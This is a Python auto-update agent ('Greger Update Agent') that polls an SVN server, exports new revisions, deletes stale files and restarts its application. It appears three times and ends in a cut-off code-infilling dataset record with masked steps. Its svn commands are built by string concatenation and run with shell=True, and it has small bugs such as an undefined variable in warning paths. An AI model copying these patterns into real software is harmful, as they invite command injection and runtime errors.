moduleReturn['revision_author'] = authorStr
localLog.debug('Revision author: ' + authorStr)
dateStr = outputList[outputList.index('svn:date') + 1]
moduleReturn['revision_date'] = dateStr
localLog.debug('Revision date: ' + dateStr)
commentStr = outputList[outputList.index('svn:log') + 1].strip()
moduleReturn['revision_comment'] = commentStr
localLog.debug('Revision Comment: ' + commentStr)
if err is not None:
localLog.debug('Error message: ' + str(err))
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
return moduleReturn
def updateSoftware(self, swRev='HEAD'):
"""
Get and updating software from server
"""
localLog = logging.getLogger(self.logPath + '.updateSoftware')
localLog.debug('Getting software revision ' + str(swRev) +
' from server and updating local client...')
localLog.debug('Constructing target path for new software...')
targetRoot = self._location
targetDir = 'gcm'
targetPath = os.path.join(targetRoot, targetDir)
localLog.debug('Target path: ' + targetPath)
localLog.debug('Retrieving relevant parameters from server...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
localLog.debug('Getting software files from server...')
pCmd = 'svn export --force -r ' + str(swRev)
pCmd += ' ' + guaSWServerURI
pCmd += ' ' + targetPath
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
if err is not None:
self.log.warning('Error message: ' + str(err))
else:
self.log.info('Download successful!')
for line in output.splitlines():
self.log.info(line)
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
localLog.debug('Reading downloaded revision from "' + output.
splitlines()[-1] + '"...')
revText = output.splitlines()[-1].split()[-1][:-1]
localLog.debug('Downloaded Revision: ' + revText)
self.localRevisionRecord = revText
localLog.debug('Listing downloaded files...')
downloadedFiles = []
for row in output.splitlines()[:-1]:
file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]
)
downloadedFiles.append(file)
localLog.debug('File: ' + file)
self.log.debug('Getting all files in local directory (after update)...'
)
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
localLog.debug('File: ' + allFiles[-1])
for dir in d:
allFiles.append(os.path.join(r, dir))
localLog.debug('Dir: ' + allFiles[-1])
self.log.info(
'Identifying old files to remove (<new_files> - <all_files>)...')
diffFiles = list(set(allFiles) - set(downloadedFiles))
for file in diffFiles:
self.log.info('Removing: ' + file)
try:
if os.path.isfile(file):
os.unlink(file)
elif os.path.isdir(file):
shutil.rmtree(file)
except Exception as e:
self.log.warning('Oops! Something went wrong! - ' + str(e))
self.log.debug('Re-getting all files in local directory...')
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
self.log.debug('File: ' + os.path.join(r, file))
for dir in d:
allFiles.append(os.path.join(r, dir))
self.log.debug('Dir: ' + os.path.join(r, file))
def run(self):
"""
Run Greger Update Agent.
"""
localLog = logging.getLogger(self.logPath + '.run')
self.log.info('Starting Greger Update Agent (GUA)...')
localLog.debug('Wait for Greger Client Module to start...')
self.ready.wait()
allThreads = {}
for thr in enumerate():
localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'
)
allThreads.update({thr.__class__.__name__: thr})
if thr.__class__.__name__ == 'GregerClientModule':
localLog.debug('Greger Client Module thread found! ' +
allThreads['GregerClientModule'].name)
loopCount = 0
while not self.stopExecution.is_set():
loopCount += 1
localLog.debug('Checking for updates (' + str(loopCount) + ')...')
localLog.debug('Getting local revision record...')
localRevision = self.localRevisionRecord
localLog.debug('Getting latest software info...')
softwareInfo = self.getSoftwareInfo()
self.log.info('Revision check done! (' + str(localRevision) + ')')
if int(localRevision) == int(softwareInfo['revision']):
self.log.info('No new revision found.')
else:
self.log.info('New revision found!')
localLog.debug('Attempting to update software...')
self.updateSoftware()
localLog.debug(
'Attempting to update server with software info...')
allThreads['GregerDatabase'].update('about', softwareInfo)
self.log.info(
'Attempting to stop all exection before restarting...')
allThreads['GregerClientModule'].stopAll(GUA=True)
self.log.info('Attemption to restart application...')
restart_program()
if 'guaCheckUpdateDelay' in GregerDatabase.settings:
delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][
'value']
else:
delayTime = 10
self.log.warning('Settings not defined! (using default=10)')
self.log.info('Waiting ' + str(delayTime) + 's...')
self.stopExecution.wait(delayTime)
self.log.info('Greger Update Agent (GUA) execution stopped!')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GregerUpdateAgent(Thread):
"""
Main class which holds the main sequence of the application.
"""
def __init__(self, ready=None):
"""
Initialize the main class
"""
Thread.__init__(self)
self.ready = ready
self.logPath = 'root.GUA'
self.log = logging.getLogger(self.logPath)
localLog = logging.getLogger(self.logPath + '.__init__')
localLog.debug('Initiating Greger Update Agent (GUA)...')
self.stopExecution = Event()
self._location = os.path.abspath(__file__)
self._location = self._location[:-15]
localLog.debug('Local path: ' + self._location)
localLog.debug('Getting configuration parameters from file...')
config = getLocalConfig()
self.localRevisionRecordPath = config.get('greger_update_agent',
'local_revision_path')
localLog.debug('Parameter: (localRevisionRecordPath) ' + self.
localRevisionRecordPath)
self.log.info('Greger Update Agent (GUA) successfully initiated!')
@property
def localRevisionRecord(self):
"""
Get local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Getting local revision record...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to get record from file...')
try:
with open(revisionRecordPath, 'r') as f:
localRecord = f.read()
localLog.debug('Local revision record: ' + str(localRecord))
except Exception as e:
self.log.warning('Failed to open file! - ' + str(e))
self.localRevisionRecord = 0
localRecord = self.localRevisionRecord
return localRecord
@localRevisionRecord.setter
def localRevisionRecord(self, newRevision):
"""
Set local revision record (.gcm)
"""
localLog = logging.getLogger(self.logPath + '.localRevisionRecord')
localLog.debug('Setting local revision record (.gcm) to ' + str(
newRevision) + '...')
revisionRecordPath = self.localRevisionRecordPath
localLog.debug('Attemption to write "' + str(newRevision) +
'" to file...')
with open(revisionRecordPath, 'w') as f:
f.write(str(newRevision))
self.log.info('Local revision record set: ' + str(newRevision))
def getSoftwareInfo(self, rev='HEAD'):
"""
Retrieve information about a revision available on server.
"""
localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')
localLog.debug('Attempting to retrieve software revision info...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
moduleReturn = {'revision': '', 'revision_SHA': '',
'revision_author': '', 'revision_date': '', 'revision_comment': ''}
localLog.debug('Attempting to retrieve info from server... ' +
guaSWServerURI)
pCmd = 'svn proplist -v -R --revprop -r ' + rev
pCmd += ' ' + guaSWServerURI
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
outputList = output.splitlines()[1:]
outputList = [elem.strip() for elem in outputList]
revStr = output.splitlines()[0]
revStr = revStr.split()[-1]
moduleReturn['revision'] = revStr[:-1]
localLog.debug('Revision: ' + revStr[:-1])
shaStr = outputList[outputList.index('git-commit') + 1]
moduleReturn['revision_SHA'] = shaStr
localLog.debug('Revision SHA: ' + shaStr)
authorStr = outputList[outputList.index('svn:author') + 1]
moduleReturn['revision_author'] = authorStr
localLog.debug('Revision author: ' + authorStr)
dateStr = outputList[outputList.index('svn:date') + 1]
moduleReturn['revision_date'] = dateStr
localLog.debug('Revision date: ' + dateStr)
commentStr = outputList[outputList.index('svn:log') + 1].strip()
moduleReturn['revision_comment'] = commentStr
localLog.debug('Revision Comment: ' + commentStr)
if err is not None:
localLog.debug('Error message: ' + str(err))
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
return moduleReturn
def updateSoftware(self, swRev='HEAD'):
"""
Get and updating software from server
"""
localLog = logging.getLogger(self.logPath + '.updateSoftware')
localLog.debug('Getting software revision ' + str(swRev) +
' from server and updating local client...')
localLog.debug('Constructing target path for new software...')
targetRoot = self._location
targetDir = 'gcm'
targetPath = os.path.join(targetRoot, targetDir)
localLog.debug('Target path: ' + targetPath)
localLog.debug('Retrieving relevant parameters from server...')
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)
else:
self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')
return
localLog.debug('Getting software files from server...')
pCmd = 'svn export --force -r ' + str(swRev)
pCmd += ' ' + guaSWServerURI
pCmd += ' ' + targetPath
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
if err is not None:
self.log.warning('Error message: ' + str(err))
else:
self.log.info('Download successful!')
for line in output.splitlines():
self.log.info(line)
except Exception as e:
self.log.error('Oops! Something went wrong - ' + str(e))
localLog.debug('Reading downloaded revision from "' + output.
splitlines()[-1] + '"...')
revText = output.splitlines()[-1].split()[-1][:-1]
localLog.debug('Downloaded Revision: ' + revText)
self.localRevisionRecord = revText
localLog.debug('Listing downloaded files...')
downloadedFiles = []
for row in output.splitlines()[:-1]:
file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]
)
downloadedFiles.append(file)
localLog.debug('File: ' + file)
self.log.debug('Getting all files in local directory (after update)...'
)
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
localLog.debug('File: ' + allFiles[-1])
for dir in d:
allFiles.append(os.path.join(r, dir))
localLog.debug('Dir: ' + allFiles[-1])
self.log.info(
'Identifying old files to remove (<new_files> - <all_files>)...')
diffFiles = list(set(allFiles) - set(downloadedFiles))
for file in diffFiles:
self.log.info('Removing: ' + file)
try:
if os.path.isfile(file):
os.unlink(file)
elif os.path.isdir(file):
shutil.rmtree(file)
except Exception as e:
self.log.warning('Oops! Something went wrong! - ' + str(e))
self.log.debug('Re-getting all files in local directory...')
allFiles = []
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
self.log.debug('File: ' + os.path.join(r, file))
for dir in d:
allFiles.append(os.path.join(r, dir))
self.log.debug('Dir: ' + os.path.join(r, file))
def run(self):
"""
Run Greger Update Agent.
"""
localLog = logging.getLogger(self.logPath + '.run')
self.log.info('Starting Greger Update Agent (GUA)...')
localLog.debug('Wait for Greger Client Module to start...')
self.ready.wait()
allThreads = {}
for thr in enumerate():
localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'
)
allThreads.update({thr.__class__.__name__: thr})
if thr.__class__.__name__ == 'GregerClientModule':
localLog.debug('Greger Client Module thread found! ' +
allThreads['GregerClientModule'].name)
loopCount = 0
while not self.stopExecution.is_set():
loopCount += 1
localLog.debug('Checking for updates (' + str(loopCount) + ')...')
localLog.debug('Getting local revision record...')
localRevision = self.localRevisionRecord
localLog.debug('Getting latest software info...')
softwareInfo = self.getSoftwareInfo()
self.log.info('Revision check done! (' + str(localRevision) + ')')
if int(localRevision) == int(softwareInfo['revision']):
self.log.info('No new revision found.')
else:
self.log.info('New revision found!')
localLog.debug('Attempting to update software...')
self.updateSoftware()
localLog.debug(
'Attempting to update server with software info...')
allThreads['GregerDatabase'].update('about', softwareInfo)
self.log.info(
'Attempting to stop all exection before restarting...')
allThreads['GregerClientModule'].stopAll(GUA=True)
self.log.info('Attemption to restart application...')
restart_program()
if 'guaCheckUpdateDelay' in GregerDatabase.settings:
delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][
'value']
else:
delayTime = 10
self.log.warning('Settings not defined! (using default=10)')
self.log.info('Waiting ' + str(delayTime) + 's...')
self.stopExecution.wait(delayTime)
self.log.info('Greger Update Agent (GUA) execution stopped!')
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Greger Update Agent (GUA) module for the Greger Client Module
"""
__author__ = "Eric Sandbling"
__license__ = 'MIT'
__status__ = 'Development'
# System modules
import os, sys
import shutil
import logging
import subprocess
from threading import Event
from threading import Thread
from threading import enumerate
# Local Modules
from common import getLocalConfig
from common import restart_program
from gdb import GregerDatabase
# from gcm import GregerClientModule
class GregerUpdateAgent(Thread):
"""
Main class which holds the main sequence of the application.
"""
def __init__(self, ready=None):
'''
Initialize the main class
'''
Thread.__init__(self)
self.ready = ready
# Setup logging
self.logPath = "root.GUA"
self.log = logging.getLogger(self.logPath)
localLog = logging.getLogger(self.logPath + ".__init__")
localLog.debug("Initiating Greger Update Agent (GUA)...")
# Stop execution handler
self.stopExecution = Event()
# Get local path
self._location = os.path.abspath(__file__)
self._location = self._location[:-15] # Trim gcm/__main__.py from path to get at location of application
localLog.debug("Local path: " + self._location)
# Get Local Configuration Parameters
localLog.debug("Getting configuration parameters from file...")
config = getLocalConfig()
# Locally relevant parameters
self.localRevisionRecordPath = config.get("greger_update_agent", "local_revision_path")
localLog.debug("Parameter: (localRevisionRecordPath) " + self.localRevisionRecordPath)
self.log.info("Greger Update Agent (GUA) successfully initiated!")
@property
def localRevisionRecord(self):
'''
Get local revision record (.gcm)
'''
# Logging
localLog = logging.getLogger(self.logPath + ".localRevisionRecord")
localLog.debug("Getting local revision record...")
# Local parameters
# revisionRecordPath = os.path.join(self._location, ".gcm")
revisionRecordPath = self.localRevisionRecordPath
localLog.debug("Attemption to get record from file...")
try:
with open(revisionRecordPath,"r") as f:
localRecord = f.read()
localLog.debug("Local revision record: " + str(localRecord))
except Exception as e:
self.log.warning("Failed to open file! - " + str(e))
self.localRevisionRecord = 0
localRecord = self.localRevisionRecord
return localRecord
@localRevisionRecord.setter
def localRevisionRecord(self, newRevision):
'''
Set local revision record (.gcm)
'''
# Logging
localLog = logging.getLogger(self.logPath + ".localRevisionRecord")
localLog.debug("Setting local revision record (.gcm) to " + str(newRevision) + "...")
# Local parameters
# revisionRecordPath = os.path.join(self._location, ".gcm")
revisionRecordPath = self.localRevisionRecordPath
localLog.debug("Attemption to write \"" + str(newRevision) + "\" to file...")
with open(revisionRecordPath,"w") as f:
f.write(str(newRevision))
self.log.info("Local revision record set: " + str(newRevision))
def getSoftwareInfo(self, rev='HEAD'):
'''
Retrieve information about a revision available on server.
'''
# Logging
localLog = logging.getLogger(self.logPath + ".getSoftwareInfo")
localLog.debug("Attempting to retrieve software revision info...")
# Locally relevant parameters
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
else:
self.log.warning("Setting " + str(guaSWSource) + " not defined!")
return
moduleReturn = {
'revision': "",
'revision_SHA' : "",
'revision_author' : "",
'revision_date' : "",
'revision_comment' : ""
}
# Get server revision info
localLog.debug("Attempting to retrieve info from server... " + guaSWServerURI)
pCmd = "svn proplist -v -R --revprop -r " + rev
pCmd += " " + guaSWServerURI
localLog.debug(pCmd)
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
# Create list of output and remove extra white spaces
outputList = output.splitlines()[1:]
outputList = [elem.strip() for elem in outputList]
# Get revision from output
revStr = output.splitlines()[0]
revStr = revStr.split()[-1]
moduleReturn['revision'] = revStr[:-1]
localLog.debug("Revision: " + revStr[:-1])
# Get SHA
shaStr = outputList[outputList.index('git-commit')+1]
moduleReturn['revision_SHA'] = shaStr
localLog.debug("Revision SHA: " + shaStr)
# Get revision author
authorStr = outputList[outputList.index('svn:author')+1]
moduleReturn['revision_author'] = authorStr
localLog.debug("Revision author: " + authorStr)
# Get revision date
dateStr = outputList[outputList.index('svn:date')+1]
moduleReturn['revision_date'] = dateStr
localLog.debug("Revision date: " + dateStr)
# Get revision comment
commentStr = outputList[outputList.index('svn:log')+1].strip()
moduleReturn['revision_comment'] = commentStr
localLog.debug("Revision Comment: " + commentStr)
if err is not None:
localLog.debug("Error message: " + str(err))
except Exception as e:
self.log.error("Oops! Something went wrong - " + str(e))
return moduleReturn
def updateSoftware(self, swRev='HEAD'):
'''
Get and updating software from server
'''
# Logging
localLog = logging.getLogger(self.logPath + ".updateSoftware")
localLog.debug("Getting software revision " + str(swRev) + " from server and updating local client...")
# Locally relevant parameters
localLog.debug("Constructing target path for new software...")
targetRoot = self._location
targetDir = "gcm"
targetPath = os.path.join(targetRoot, targetDir)
localLog.debug("Target path: " + targetPath)
localLog.debug("Retrieving relevant parameters from server...")
if 'guaSWSource' in GregerDatabase.settings:
guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']
localLog.debug("Parameter: (guaSWSource) " + guaSWServerURI)
else:
self.log.warning("Setting " + str(guaSWSource) + " not defined!")
return
# Get software files from server
localLog.debug("Getting software files from server...")
# Compile download command
pCmd = "svn export --force -r " + str(swRev)
pCmd += " " + guaSWServerURI
pCmd += " " + targetPath
localLog.debug(pCmd)
# Execute command
try:
p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
if err is not None:
self.log.warning("Error message: " + str(err))
else:
self.log.info("Download successful!")
# Print output
for line in output.splitlines():
self.log.info(line)
except Exception as e:
self.log.error("Oops! Something went wrong - " + str(e))
# Read revision text
localLog.debug("Reading downloaded revision from \"" + output.splitlines()[-1] + "\"...")
revText = output.splitlines()[-1].split()[-1][:-1]
localLog.debug("Downloaded Revision: " + revText)
# Update local revision record
self.localRevisionRecord = revText
# Get downloaded files text
localLog.debug("Listing downloaded files...")
downloadedFiles = []
for row in output.splitlines()[:-1]:
file = os.path.join(targetRoot, [t.strip() for t in row.split()][1])
downloadedFiles.append(file)
localLog.debug("File: " + file)
# List files in directory
self.log.debug("Getting all files in local directory (after update)...")
allFiles = []
# r=root, d=directories, f = files
for r, d, f in os.walk(targetPath):
for file in f:
# allFiles.append(os.path.abspath(file))
allFiles.append(os.path.join(r, file))
localLog.debug("File: " + allFiles[-1])
# localLog.debug("File: " + os.path.join(r, file))
for dir in d:
# allFiles.append(os.path.abspath(dir))
allFiles.append(os.path.join(r, dir))
localLog.debug("Dir: " + allFiles[-1])
# localLog.debug("Dir: " + os.path.join(r, dir))
self.log.info("Identifying old files to remove (<new_files> - <all_files>)...")
diffFiles = list(set(allFiles) - set(downloadedFiles))
for file in diffFiles:
self.log.info("Removing: " + file)
try:
if os.path.isfile(file):
os.unlink(file)
elif os.path.isdir(file):
shutil.rmtree(file)
except Exception as e:
self.log.warning("Oops! Something went wrong! - " + str(e))
# List files in directory
self.log.debug("Re-getting all files in local directory...")
allFiles = []
# r=root, d=directories, f = files
for r, d, f in os.walk(targetPath):
for file in f:
allFiles.append(os.path.join(r, file))
self.log.debug("File: " + os.path.join(r, file))
for dir in d:
allFiles.append(os.path.join(r, dir))
self.log.debug("Dir: " + os.path.join(r, file))
def run(self):
'''
Run Greger Update Agent.
'''
# Logging
localLog = logging.getLogger(self.logPath + ".run")
self.log.info("Starting Greger Update Agent (GUA)...")
# Wait for Greger Client Module to start...
localLog.debug("Wait for Greger Client Module to start...")
self.ready.wait()
# Get all active threads!
allThreads = {}
for thr in enumerate():
localLog.debug(thr.name + " " + thr.__class__.__name__ +" active!")
allThreads.update({thr.__class__.__name__ : thr})
if thr.__class__.__name__ == "GregerClientModule":
localLog.debug("Greger Client Module thread found! " +
allThreads['GregerClientModule'].name)
# Start checking for updates
loopCount = 0
while not self.stopExecution.is_set():
loopCount += 1
localLog.debug("Checking for updates (" + str(loopCount) + ")...")
# Get local revision record
localLog.debug("Getting local revision record...")
localRevision = self.localRevisionRecord
# Get server revision...
localLog.debug("Getting latest software info...")
softwareInfo = self.getSoftwareInfo()
self.log.info("Revision check done! (" + str(localRevision) + ")")
if int(localRevision) == int(softwareInfo['revision']):
self.log.info("No new revision found.")
else:
self.log.info("New revision found!")
# Do update!!
localLog.debug("Attempting to update software...")
self.updateSoftware()
# Update server with updated software
localLog.debug("Attempting to update server with software info...")
allThreads['GregerDatabase'].update('about', softwareInfo)
# Tell GCM to stop all treads (except GUA)...
self.log.info("Attempting to stop all exection before restarting...")
allThreads['GregerClientModule'].stopAll(GUA=True)
# Restart Application
self.log.info("Attemption to restart application...")
restart_program()
if 'guaCheckUpdateDelay' in GregerDatabase.settings:
delayTime = GregerDatabase.settings['guaCheckUpdateDelay']['value']
else:
delayTime = 10
self.log.warning("Settings not defined! (using default=10)")
# Wait update delay
self.log.info("Waiting " + str(delayTime) + "s...")
self.stopExecution.wait(delayTime)
self.log.info("Greger Update Agent (GUA) execution stopped!")
|
flexible
|
{
"blob_id": "a9b2a4d4924dcdd6e146ea346e71bf42c0259846",
"index": 593,
"step-1": "<mask token>\n\n\nclass GregerUpdateAgent(Thread):\n <mask token>\n <mask token>\n\n @property\n def localRevisionRecord(self):\n \"\"\"\n Get local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Getting local revision record...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to get record from file...')\n try:\n with open(revisionRecordPath, 'r') as f:\n localRecord = f.read()\n localLog.debug('Local revision record: ' + str(localRecord))\n except Exception as e:\n self.log.warning('Failed to open file! - ' + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n return localRecord\n <mask token>\n\n def getSoftwareInfo(self, rev='HEAD'):\n \"\"\"\n Retrieve information about a revision available on server.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')\n localLog.debug('Attempting to retrieve software revision info...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n moduleReturn = {'revision': '', 'revision_SHA': '',\n 'revision_author': '', 'revision_date': '', 'revision_comment': ''}\n localLog.debug('Attempting to retrieve info from server... ' +\n guaSWServerURI)\n pCmd = 'svn proplist -v -R --revprop -r ' + rev\n pCmd += ' ' + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug('Revision: ' + revStr[:-1])\n shaStr = outputList[outputList.index('git-commit') + 1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug('Revision SHA: ' + shaStr)\n authorStr = outputList[outputList.index('svn:author') + 1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug('Revision author: ' + authorStr)\n dateStr = outputList[outputList.index('svn:date') + 1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug('Revision date: ' + dateStr)\n commentStr = outputList[outputList.index('svn:log') + 1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug('Revision Comment: ' + commentStr)\n if err is not None:\n localLog.debug('Error message: ' + str(err))\n except Exception as e:\n self.log.error('Oops! Something went wrong - ' + str(e))\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n \"\"\"\n Get and updating software from server\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.updateSoftware')\n localLog.debug('Getting software revision ' + str(swRev) +\n ' from server and updating local client...')\n localLog.debug('Constructing target path for new software...')\n targetRoot = self._location\n targetDir = 'gcm'\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug('Target path: ' + targetPath)\n localLog.debug('Retrieving relevant parameters from server...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n localLog.debug('Getting software files from server...')\n pCmd = 'svn export --force -r ' + str(swRev)\n pCmd += ' ' + guaSWServerURI\n pCmd += ' ' + targetPath\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n if err is not None:\n self.log.warning('Error message: ' + str(err))\n else:\n self.log.info('Download successful!')\n for line in output.splitlines():\n self.log.info(line)\n except Exception as e:\n self.log.error('Oops! Something went wrong - ' + str(e))\n localLog.debug('Reading downloaded revision from \"' + output.\n splitlines()[-1] + '\"...')\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug('Downloaded Revision: ' + revText)\n self.localRevisionRecord = revText\n localLog.debug('Listing downloaded files...')\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]\n )\n downloadedFiles.append(file)\n localLog.debug('File: ' + file)\n self.log.debug('Getting all files in local directory (after update)...'\n )\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n localLog.debug('File: ' + allFiles[-1])\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n localLog.debug('Dir: ' + allFiles[-1])\n self.log.info(\n 'Identifying old files to remove (<new_files> - <all_files>)...')\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info('Removing: ' + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning('Oops! Something went wrong! - ' + str(e))\n self.log.debug('Re-getting all files in local directory...')\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug('File: ' + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug('Dir: ' + os.path.join(r, file))\n\n def run(self):\n \"\"\"\n Run Greger Update Agent.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.run')\n self.log.info('Starting Greger Update Agent (GUA)...')\n localLog.debug('Wait for Greger Client Module to start...')\n self.ready.wait()\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'\n )\n allThreads.update({thr.__class__.__name__: thr})\n if thr.__class__.__name__ == 'GregerClientModule':\n localLog.debug('Greger Client Module thread found! ' +\n allThreads['GregerClientModule'].name)\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug('Checking for updates (' + str(loopCount) + ')...')\n localLog.debug('Getting local revision record...')\n localRevision = self.localRevisionRecord\n localLog.debug('Getting latest software info...')\n softwareInfo = self.getSoftwareInfo()\n self.log.info('Revision check done! (' + str(localRevision) + ')')\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info('No new revision found.')\n else:\n self.log.info('New revision found!')\n localLog.debug('Attempting to update software...')\n self.updateSoftware()\n localLog.debug(\n 'Attempting to update server with software info...')\n allThreads['GregerDatabase'].update('about', softwareInfo)\n self.log.info(\n 'Attempting to stop all exection before restarting...')\n allThreads['GregerClientModule'].stopAll(GUA=True)\n self.log.info('Attemption to restart application...')\n restart_program()\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][\n 'value']\n else:\n delayTime = 10\n self.log.warning('Settings not defined! (using default=10)')\n self.log.info('Waiting ' + str(delayTime) + 's...')\n self.stopExecution.wait(delayTime)\n self.log.info('Greger Update Agent (GUA) execution stopped!')\n",
"step-2": "<mask token>\n\n\nclass GregerUpdateAgent(Thread):\n <mask token>\n <mask token>\n\n @property\n def localRevisionRecord(self):\n \"\"\"\n Get local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Getting local revision record...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to get record from file...')\n try:\n with open(revisionRecordPath, 'r') as f:\n localRecord = f.read()\n localLog.debug('Local revision record: ' + str(localRecord))\n except Exception as e:\n self.log.warning('Failed to open file! - ' + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n return localRecord\n\n @localRevisionRecord.setter\n def localRevisionRecord(self, newRevision):\n \"\"\"\n Set local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Setting local revision record (.gcm) to ' + str(\n newRevision) + '...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to write \"' + str(newRevision) +\n '\" to file...')\n with open(revisionRecordPath, 'w') as f:\n f.write(str(newRevision))\n self.log.info('Local revision record set: ' + str(newRevision))\n\n def getSoftwareInfo(self, rev='HEAD'):\n \"\"\"\n Retrieve information about a revision available on server.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')\n localLog.debug('Attempting to retrieve software revision info...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n moduleReturn = {'revision': '', 'revision_SHA': '',\n 'revision_author': '', 'revision_date': '', 'revision_comment': ''}\n localLog.debug('Attempting to retrieve info from server... ' +\n guaSWServerURI)\n pCmd = 'svn proplist -v -R --revprop -r ' + rev\n pCmd += ' ' + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug('Revision: ' + revStr[:-1])\n shaStr = outputList[outputList.index('git-commit') + 1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug('Revision SHA: ' + shaStr)\n authorStr = outputList[outputList.index('svn:author') + 1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug('Revision author: ' + authorStr)\n dateStr = outputList[outputList.index('svn:date') + 1]\n 